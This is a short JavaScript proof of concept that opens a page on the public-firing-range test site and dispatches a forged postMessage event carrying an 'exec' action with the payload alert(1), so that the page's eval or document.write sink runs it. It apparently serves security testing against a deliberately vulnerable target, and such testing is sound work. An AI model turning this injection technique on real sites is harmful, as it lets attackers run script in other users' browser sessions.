function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms));
}
async function demo() {
  var x = window.open(
"https://public-firing-range.appspot.com/dom/toxicdom/postMessage/complexMessageDocumentWriteEval");
  var e = new Event('message');
  e.data = JSON.parse('{"action":"exec","payload":"alert(1);"}');
  await sleep(2000);
  x.dispatchEvent(e);
}
demo();